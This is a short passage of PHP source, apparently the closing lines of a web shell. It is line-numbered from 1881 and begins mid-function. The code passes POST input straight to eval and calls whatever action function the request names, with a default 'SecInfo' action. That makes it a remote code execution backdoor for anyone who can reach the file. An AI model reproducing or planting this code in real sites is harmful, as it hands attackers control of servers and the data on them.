  1881.         eval($_POST['p1']);
  1882.     }
  1883. }
  1884. if( empty($_POST['a']) )
  1885.     if(isset($default_action) && function_exists('action' . $default_action))
  1886.         $_POST['a'] = $default_action;
  1887.     else
  1888.         $_POST['a'] = 'SecInfo';
  1889. if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
  1890.     call_user_func('action' . $_POST['a']);
  1891. exit; ?>